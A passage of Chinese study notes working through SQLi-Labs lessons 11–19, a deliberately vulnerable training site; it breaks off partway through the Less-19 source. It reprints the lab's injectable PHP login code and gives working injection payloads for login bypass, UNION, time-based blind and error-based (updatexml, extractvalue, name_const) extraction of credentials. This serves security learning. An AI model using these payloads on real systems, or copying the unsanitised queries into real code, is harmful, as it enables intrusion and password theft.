程序博客网 > 透视衣服软件

SQLi-Labs 学习笔记(Less 11-20)

来源:互联网 发布:透视衣服软件 编辑:程序博客网 时间:2024/05/17 02:51

SQLi-Labs 学习笔记

SQL 百度百科:结构化查询语言,也叫做SQL,从根本上说是一种处理数据库的编程语言。对于初学者,数据库仅仅是在客户端和服务端进行数据存储。SQL通过结构化查询,关系,面向对象编程等等来管理数据库。编程极客们总是搞出许多这样类型的软件,像MySQL,MS SQL ,Oracle以及Postgresql。现在有一些程序能让我们有能力通过结构化查询来管理大型数据库。


SQLi Labs下载地址:https://github.com/Audi-1/sqli-labs


ps:以下的内容有些是我从别人经验当中摘抄下来的,有些是我自己写的,我把四面八方的经验总结起来给大家,也为了提升自己的技术,如有疑问请在评论区提问,谢谢。


Less-11 基于错误的POST型单引号字符型注入


先打开网页查看 Welcome Dhakkan


②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-11- Error Based- String</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome  <font color="#FF0000"> Dhakkan </font><br></div><div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the data for sql injections Error based SQL Injection--><form action="" name="form1" method="post"><div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/></div>  <div> Password  :    <input type="text" name="passwd" value=""/></div></br><div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="6" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname);fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){  //echo '<font color= "#0000ff">';    echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in\n\n " ;echo '<font size="3" color="#0000ff">';echo "<br>";echo 'Your Login name:'. $row['username'];echo "<br>";echo 'Your Password:' .$row['password'];echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg"  />';  echo "</font>";  }else  {echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg" />';echo "</font>";  }}?></font></div></body></html>

我们来看一下这次是什么类型的提交,以及提交的字段是什么,打开网络查看器查看

答案是POST提交,提交的字段是uname和passwd,那么我们加一个单引号让它报错:

我们把 整个被单引号引着的复制下来,把左端和右端的单引号去掉,就变成下面的:
test' LIMIT 0,1

那么可以判断是单引号注入类型了,接下来构建 POST 提交
uname=user' or 1=1 #&passwd=user'

拿到用户名和密码了,登陆一下,成功登陆,当然除了用注释还可以闭合单引号,当这里有个问题探讨,看下图

没有显示出来?我们看下 Sql 语句是什么样的:
SELECT username,password From users WHERE username='user' or '1'='1' and password='user' LIMIT 0,1

首先and的优先级高于or  【就是and先运算】,那么    '1'='1' and password='user' 先运算,因为users表里面的password字段没有一个数据是user,右边是false,那么整个表达式就是false,那么语句就变成:
SELECT username, password FROM users WHERE username='user' or false

所以我们要怎么办呢,uname这里不行,我们尝试passwd,发现是可以的

对应的SQL语句是:
SELECT username,password FROM users WHERE username='user' and password='user' or '1'='1' LIMIT 0,1

左边是FALSE,or 右边是true,当然就绕过了,一般第一个登陆字段(一般是用户名)就用注释,第二个登陆字段(一般就密码)用闭合和注释都是可以的。

接下类我们就可以使用 联合查询来看下数据库的信息:

构建如下 POST字段:
uname=user&passwd=user' union select group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users#

当然,想用盲注也可以,就是要写脚本
uname=user&passwd=user' or length(database())=8#




Less-12基于错误的双引号POST型字符型变形的注入

先打开网页查看 Welcome Dhakkan


②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-12- Error Based- Double quotes- String</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome  <font color="#FF0000"> Dhakkan </font><br></div><div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the data for sql injections Error based SQL Injection--><form action="" name="form1" method="post"><div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/></div>  <div> Password  :    <input type="text" name="passwd" value=""/></div></br><div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="6" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname."\n");fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity$uname='"'.$uname.'"';$passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){  //echo '<font color= "#0000ff">';    echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in " ;echo '<font size="3" color="#0000ff">';echo "<br>";echo 'Your Login name:'. $row['username'];echo "<br>";echo 'Your Password:' .$row['password'];echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg"   />';  echo "</font>";  }else  {echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg"   />';echo "</font>";  }}?></font></div></body></html>

先用什么单引号双引号看看,报错就看出它有没有用引号,或者加了其他东西

那么这里明显看出用)将变量括着,那么直接绕过,构建 POST 字段:
uname=abc&passwd=abc") or 1=1#


Less-13POST单引号变形双注入

先打开网页查看 Welcome Dhakkan


②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-13- Double Injection- String- with twist</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome  <font color="#FF0000"> Dhakkan </font><br></div><div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the data for sql injections Error based SQL Injection--><form action="" name="form1" method="post"><div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/></div>  <div> Password  :    <input type="text" name="passwd" value=""/></div></br><div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="6" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname."\n");fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){  //echo '<font color= "#0000ff">';    echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in " ;echo '<font size="3" color="#0000ff">';echo "<br>";//echo 'Your Login name:'. $row['username'];//echo "<br>";//echo 'Your Password:' .$row['password'];//echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg"   />';  echo "</font>";  }else  {echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg"   />';echo "</font>";  }}?></font></div></body></html>

没多少区别,之前也讲过了,根据判断可以得知是 (' $id ') 类型的,那么


Less-14POST单引号变形双注入

先打开网页查看 Welcome Dhakkan


②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-14- Double Injection- Double quotes- String</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome  <font color="#FF0000"> Dhakkan </font><br></div><div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the data for sql injections Error based SQL Injection--><form action="" name="form1" method="post"><div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/></div>  <div> Password  :    <input type="text" name="passwd" value=""/></div></br><div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="6" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname."\n");fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity$uname='"'.$uname.'"';$passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){  //echo '<font color= "#0000ff">';    echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in " ;echo '<font size="3" color="#0000ff">';echo "<br>";//echo 'Your Login name:'. $row['username'];//echo "<br>";//echo 'Your Password:' .$row['password'];//echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg" />';  echo "</font>";  }else  {echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg"  />';echo "</font>";  }}?></font></div></body></html>

单引号没报错,双引号就报错了,然后就不说了,都懂



Less-15基于bool型/时间延迟单引号POST型盲注

先打开网页查看 Welcome Dhakkan


②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-15- Blind- Boolian Based- String</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome  <font color="#FF0000"> Dhakkan </font><br></div><div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the data for sql injections Error based SQL Injection--><form action="" name="form1" method="post"><div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/></div>  <div> Password  :    <input type="text" name="passwd" value=""/></div></br><div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="6" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname);fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){  //echo '<font color= "#0000ff">';    echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in\n\n " ;echo '<font size="3" color="#0000ff">';echo "<br>";//echo 'Your Login name:'. $row['username'];echo "<br>";//echo 'Your Password:' .$row['password'];echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg"  />';  echo "</font>";  }else  {echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";//print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg"   />';echo "</font>";  }}?></font></div></body></html>

这里输入单引号,双引号就不会报错了,用时间延迟函数了,先确定是单引号盲注:

ok,没错。


Less-16基于bool型/时间延迟的双引号POST型盲注

先打开网页查看 Welcome Dhakkan

②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-16- Blind- Time Based- Double quotes- String</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome  <font color="#FF0000"> Dhakkan </font><br></div><div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the data for sql injections Error based SQL Injection--><form action="" name="form1" method="post"><div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/></div>  <div> Password  :    <input type="text" name="passwd" value=""/></div></br><div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="6" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname."\n");fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity$uname='"'.$uname.'"';$passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){  //echo '<font color= "#0000ff">';    echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in " ;echo '<font size="3" color="#0000ff">';echo "<br>";//echo 'Your Login name:'. $row['username'];echo "<br>";//echo 'Your Password:' .$row['password'];echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg"  />';  echo "</font>";  }else  {echo '<font color= "#0000ff" font size="3">';echo "</br>";echo "</br>";//echo "Try again looser";//print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg"  />';echo "</font>";  }}?></font></div></body></html>

uname=a&passwd=a") or 1=1# ,判断为双引号变形,测试:
uname=a&passwd=a")  or if(length(database())=7,1,sleep(5)) #
uname=a&passwd=a")  or if(length(database())=8,1,sleep(5)) #



Less-17基于错误的更新查询POST注入

先打开网页查看 Welcome Dhakkan


②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-17 Update Query- Error based - String</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"><font color="#FFFF00"> [PASSWORD RESET] </br></font>  <font color="#FF0000"> Dhakkan </font><br></div><div  align="center" style="margin:20px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the contents --><form action="" name="form1" method="post">  <div style="margin-top:15px; height:30px;">User Name      :         <input type="text"  name="uname" value=""/>  </div>    <div> New Password :        <input type="text" name="passwd" value=""/></div></br>    <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="6" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);function check_input($value){if(!empty($value)){// truncation (see comments)$value = substr($value,0,15);}// Stripslashes if magic quotes enabledif (get_magic_quotes_gpc()){$value = stripslashes($value);}// Quote if not a numberif (!ctype_digit($value)){$value = "'" . mysql_real_escape_string($value) . "'";}else{$value = intval($value);}return $value;}// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){//making sure uname is not injectable$uname=check_input($_POST['uname']);  $passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname."\n");fwrite($fp,'New Password:'.$passwd."\n");fclose($fp);// connectivity @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);//echo $row;if($row){  //echo '<font color= "#0000ff">';$row1 = $row['username'];  //echo 'Your Login name:'. $row1;$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";mysql_query($update);  echo "<br>";if (mysql_error()){echo '<font color= "#FFFF00" font size = 3 >';print_r(mysql_error());echo "</br></br>";echo "</font>";}else{echo '<font color= "#FFFF00" font size = 3 >';//echo " You password has been successfully updated " ;echo "<br>";echo "</font>";}echo '<img src="../images/flag1.jpg"   />';//echo 'Your Password:' .$row['password'];  echo "</font>";  }else  {echo '<font size="4.5" color="#FFFF00">';//echo "Bug off you Silly Dumb hacker";echo "</br>";echo '<img src="../images/slap1.jpg"   />';echo "</font>";  }}?></font></div></body></html>


来分析一下代码,他的大概执行过程是接收到username和password后,首先根据username的值查询数据库返回username和password,然后再将原有的password值用接收到的值替换掉,这里有一个问题是,username在接收时用了一个自定义的过滤函数check_input(),这个函数首先做了判空处理,合法就截取username的前15个字符,然后是通过get_magic_quotes_gpc()的返回值判断magic_quotes_gpc的值是on还是off:

magic_quotes_gpc=on时, 不用对输入和输出数据库的字符串数据作addslashes()和stripslashes()的操作,数据也会正常显示。如果此时对输入的数据作了addslashes()处理,那么在输出的时候就必须使用stripslashes()去掉多余的反斜杠。

magic_quotes_gpc=off 时,必须使用addslashes()对输入数据进行处理,但并不需要使用stripslashes()格式化输出,因为addslashes()并未将反斜杠一起写入数据库,只是帮助mysql完成了sql语句的执行。

最后,他用了ctype_digit()判断username值的类型是否是数字,是字符就用mysql_real_escape_string对特殊字符进行转义

显然,username这里并不好注入,只有通过弱口令爆破,像是admin之类的,但是他对password的接收没有做过滤的处理,于是我们可以在这里动手脚
$uname=check_input($_POST['uname']);  $passwd=$_POST['passwd'];

对于update的注入有几种思路,我们将他连同insert和delete一起来总结一下:

1、子查询注入

子查询注入原理即双注入,对于dateup、delete和insert通常都是结合or的逻辑判断,本题为例我们对update可以构造如下语句

获取数据库名:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x7e,0x27,database(),0x27,0x7e)),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23

获取表名:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select group_concat(0x7e,0x27,table_name,0x27,0x7e) from information_schema.tables where table_schema='security'),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23

获取字段名:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select group_concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema='security' and table_name='users'),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23

获取用户信息,这里不知道为什么执行不成功:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x27,id,0x7e,username,0x7e,password,0x27) from users limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23

如果有哪位朋友知道怎么解决,麻烦在下面评论区提出解决方法,有可能是我mysql版本的问题吧。


2、通过name_const():
name_const(name,value):返回给定值,当用来产生一个结果集合列时, name_const()促使该列使用给定名称,
但他的使用范围受限,只适用于一些数据库版本高于5.0.12,但又稍旧的版本,像现在的5.7版本就不用想了...然而我用的就是较新的版本,注入只能显示数据库的版本信息,想要查询其他的信息,会显示Incorrect arguments to NAME_CONST,所以,这里我就不截图了,直接放payload:
uname=admin&passwd=1' or (select * from (select(name_const(database(),1)),name_const(database(),1))a) where username='admin'%23
uname=admin&passwd=1' or (select * from (select(name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1)),name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1))a)

总的来说,对于update,insert和delete都有一个固定的结构:... or (select * from(select name_const((select ...),1),name_const((select...),1))a) ...

3、通过updatexml():payload:updatexml(1,concat(0x7e,(version())),0)

updatexml(xml_target,xpath_expr,new_xml)函数:

第一个参数是 目标xml
第二个参数是 xpath的表达式,这个看w3c那个xpath教程
第三个参数是 要将xpath的表达式的东西将目标xml替换成什么

xpath教程看这  http://www.w3school.com.cn/xpath/

xml_target和new_xml参数随便设定一个数就行,这里主要让他报错

首先获取数据库名:
uname=admin&passwd=' or updatexml(1,concat(0x7e,concat(database()),0x7e),1)#

获取表名:
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#

获取字段名:
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#


获取用户信息,当然这里也失败了:
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select * from(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)a),0x7e),0)#


INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(select b.n from (select concat_ws(char(32,44,32),id,username,password) n from users u where u.id=1)b)),0) or'', 'Nervo');


4、通过extractvalue():

extractvalue(xml,value)函数也是MYSQL5.1以后推出的对XML文档数据进行查询和修改的XPATH函数,注入时第一个参数随便给一个数字。直接上payload:
uname=admin&passwd=' or extractvalue(1,concat(0x7e,(select * from(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)a),0x7e))%23


Less-18基于错误的用户代理,头部POST注入

先打开网页查看 Welcome Dhakkan


②查看源码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-18 Header Injection- Error Based- string</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome   <font color="#FF0000"> Dhakkan </font><br></div><div  align="center" style="margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the contents --><form action="" name="form1" method="post">  <div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/>  </div>    <div> Password :        <input type="text" name="passwd" value=""/></div></br>    <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="3" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);function check_input($value){if(!empty($value)){// truncation (see comments)$value = substr($value,0,20);}// Stripslashes if magic quotes enabledif (get_magic_quotes_gpc()){$value = stripslashes($value);}// Quote if not a numberif (!ctype_digit($value)){$value = "'" . mysql_real_escape_string($value) . "'";}else{$value = intval($value);}return $value;}$uagent = $_SERVER['HTTP_USER_AGENT'];$IP = $_SERVER['REMOTE_ADDR'];echo "<br>";echo 'Your IP ADDRESS is: ' .$IP;echo "<br>";//echo 'Your User Agent is: ' .$uagent;// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);/*echo 'Your Your User name:'. $uname;echo "<br>";echo 'Your Password:'. $passwd;echo "<br>";echo 'Your User Agent String:'. $uagent;echo "<br>";echo 'Your User Agent String:'. $IP;*///logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Agent:'.$uname."\n");fclose($fp);$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);if($row1){echo '<font color= "#FFFF00" font size = 3 >';$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";mysql_query($insert);//echo 'Your IP ADDRESS is: ' .$IP;echo "</font>";//echo "<br>";echo '<font color= "#0000ff" font size = 3 >';echo 'Your User Agent is: ' .$uagent;echo "</font>";echo "<br>";print_r(mysql_error());echo "<br><br>";echo '<img src="../images/flag.jpg"  />';echo "<br>";}else{echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg"   />';echo "</font>";  }}?></font></div></body></html>

对uname和passwd进行了check_input()函数的处理,所以我们在输入uname和passwd上进行注入是不行的,但

是在代码中,我们看到了insert()

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

将useragent和ip插入到数据库中,那么我们是不是可以用这个来进行注入呢?Ip地址我们这里修改不是很方便,但是useragent修改较为方便,我们从useragent入手。


那么用什么工具手注呢,burp的repeater非常方便,用火狐的某些插件应该也可以如live http headers,tamper data,下面我用 burp suite 来演示


首先这里要输入正确的账号和密码才能绕过账号密码判断,进入处理uagent部分,这里跟我们现实中的注册登录再注入是比较贴合,这里我们输入正确的账号密码就输出我们的uagent

接下来,利用 Burp suite 抓包改包,获取数据库名称,有很多种方式,构建语句:
' or updatexml(1,concat(0x2b5e,database()),0) or '‘and extractvalue(1,concat(0x7e,(database())) and ‘1‘=‘1

就不按步骤来了,直接获取用户名和密码信息:
' or updatexml(1,concat(0x2b5e,(select concat_ws(0x2b5e,id,username,password) from users limit 0,1)),0) or '



Less-19基于头部的Referer POST报错

先打开网页查看 Welcome Dhakkan


②查看源代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Less-19 Header Injection- Referer- Error Based- string</title></head><body bgcolor="#000000"><div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome   <font color="#FF0000"> Dhakkan </font><br></div><div  align="center" style="margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;"><div style="padding-top:10px; font-size:15px;"> <!--Form to post the contents --><form action="" name="form1" method="post">  <div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/>  </div>    <div> Password :        <input type="text" name="passwd" value=""/></div></br>    <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div></form></div></div><div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"><font size="3" color="#FFFF00"><?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);function check_input($value){if(!empty($value)){// truncation (see comments)$value = substr($value,0,20);}// Stripslashes if magic quotes enabledif (get_magic_quotes_gpc()){$value = stripslashes($value);}// Quote if not a numberif (!ctype_digit($value)){$value = "'" . mysql_real_escape_string($value) . "'";}else{$value = intval($value);}return $value;}$uagent = $_SERVER['HTTP_REFERER'];$IP = $_SERVER['REMOTE_ADDR'];echo "<br>";echo 'Your IP ADDRESS is: ' .$IP;echo "<br>";//echo 'Your User Agent is: ' .$uagent;// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);/*echo 'Your Your User name:'. $uname;echo "<br>";echo 'Your Password:'. $passwd;echo "<br>";echo 'Your User Agent String:'. $uagent;echo "<br>";echo 'Your User Agent String:'. $IP;*///logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'Referer:'.$uname."\n");fclose($fp);$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);if($row1){echo '<font color= "#FFFF00" font size = 3 